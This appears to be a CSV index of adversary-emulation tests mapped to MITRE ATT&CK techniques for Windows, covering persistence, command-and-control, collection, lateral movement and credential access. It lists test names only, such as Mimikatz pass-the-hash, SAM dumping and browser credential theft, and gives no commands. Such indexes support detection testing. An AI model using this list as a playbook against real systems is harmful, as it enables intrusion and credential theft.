persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1098,Account Manipulation,10,Domain Password Policy Check: Short Password,fc5f9414-bd67-4f5f-a08e-e5381e29cbd1,powershell
persistence,T1098,Account Manipulation,11,Domain Password Policy Check: No Number in Password,68190529-069b-4ffc-a942-919704158065,powershell
persistence,T1098,Account Manipulation,12,Domain Password Policy Check: No Special Character in Password,7d984ef2-2db2-4cec-b090-e637e1698f61,powershell
persistence,T1098,Account Manipulation,13,Domain Password Policy Check: No Uppercase Character in Password,b299c120-44a7-4d68-b8e2-8ba5a28511ec,powershell
persistence,T1098,Account Manipulation,14,Domain Password Policy Check: No Lowercase Character in Password,945da11e-977e-4dab-85d2-f394d03c5887,powershell
persistence,T1098,Account Manipulation,15,Domain Password Policy Check: Only Two Character Classes,784d1349-5a26-4d20-af5e-d6af53bae460,powershell
persistence,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
